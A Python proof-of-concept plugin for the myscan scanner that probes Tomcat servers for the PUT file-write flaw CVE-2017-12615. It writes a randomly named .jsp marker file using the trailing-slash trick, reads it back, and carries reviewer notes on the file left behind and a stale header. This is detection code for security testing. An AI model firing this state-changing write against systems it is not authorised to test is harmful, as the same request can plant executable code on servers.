#!/usr/bin/env python3
# @Time    : 2020-02-17
# @Author  : caicai
# @File    : poc_iis_6.0_shortname.py  (stale header: the code below checks Tomcat PUT file write, CVE-2017-12615)
import copy
from myscan.config import scan_set
from myscan.lib.helper.request import request
from myscan.lib.core.common import get_random_str


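class POC():
    """Directory-level check for Tomcat HTTP PUT file write (CVE-2017-12615).

    The check writes a randomly named ``.jsp`` file containing a random
    marker string with PUT, then fetches it with GET and reports a finding
    when the marker is served back.

    NOTE(review): this is a state-changing probe. On a writable server the
    marker file stays on the target; nothing here removes it, so findings
    should be followed by cleanup of the written file.
    """

    def __init__(self, workdata):
        """Store the work item and initialise finding metadata.

        Args:
            workdata: mapping with ``dictdata`` (parsed request data; see the
                project's developer guide for the dict layout) and ``data``
                (the directory URL under test, ending in ``/``).
        """
        # Fall back to an empty dict so verify() does not fail with
        # AttributeError when the work item carries no "dictdata".
        self.dictdata = workdata.get("dictdata") or {}
        # Directory URL to test; ends with "/", e.g. https://www.baidu.com/home/
        self.url = workdata.get("data")
        # Findings: each entry is a dict with name, url, level and detail,
        # where detail must itself be a dict (see the append in verify()).
        self.result = []
        self.name = "tomcat put rce"
        self.vulmsg = '''cve-2017-12615,Tomcat配置了可写（readonly=false），导致我们可以往服务器写文件'''
        # NOTE(review): the legend used in this file is 0:Low 1:Medium 2:High;
        # 3 falls outside it -- confirm the intended severity scale.
        self.level = 3

    def verify(self):
        """Run the PUT/GET probe and append a finding to ``self.result``.

        Returns None in every case; the outcome is recorded in
        ``self.result`` only.
        """
        # Limit directory depth according to the "max_dir" scan setting.
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return

        # Headers of the original request are reused (mainly to keep cookies),
        # so the probe runs with whatever session the captured request had.
        # A missing "request" entry yields None instead of raising.
        headers = (self.dictdata.get("request") or {}).get("headers")

        url = self.url + get_random_str(6).lower() + ".jsp"
        data = get_random_str(20)  # random marker, looked for in the GET body
        req = {
            "method": "PUT",
            "url": url + "/",
            "headers": headers,
            "data": data,
            "timeout": 10,
            # TLS certificate validation is off for this request.
            "verify": False,
        }

        r = request(**req)
        # Only a 201 Created answer to the PUT is followed up.
        if r is not None and r.status_code == 201:
            req2 = {
                "method": "GET",
                "url": url,
                "headers": headers,
                "timeout": 10,
                "verify": False,
            }
            r2 = request(**req2)
            # Truthiness of r2 is kept as in the original check; presumably
            # the helper returns None on failure -- confirm against
            # myscan.lib.helper.request.
            if r2 and data in r2.text:
                # NOTE(review): "url" reports the scanned directory, not the
                # file that was written; the written path is `url` above.
                self.result.append({
                    "name": self.name,
                    "url": self.url,
                    "level": self.level,
                    "detail": {
                        "vulmsg": self.vulmsg,
                    }
                })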
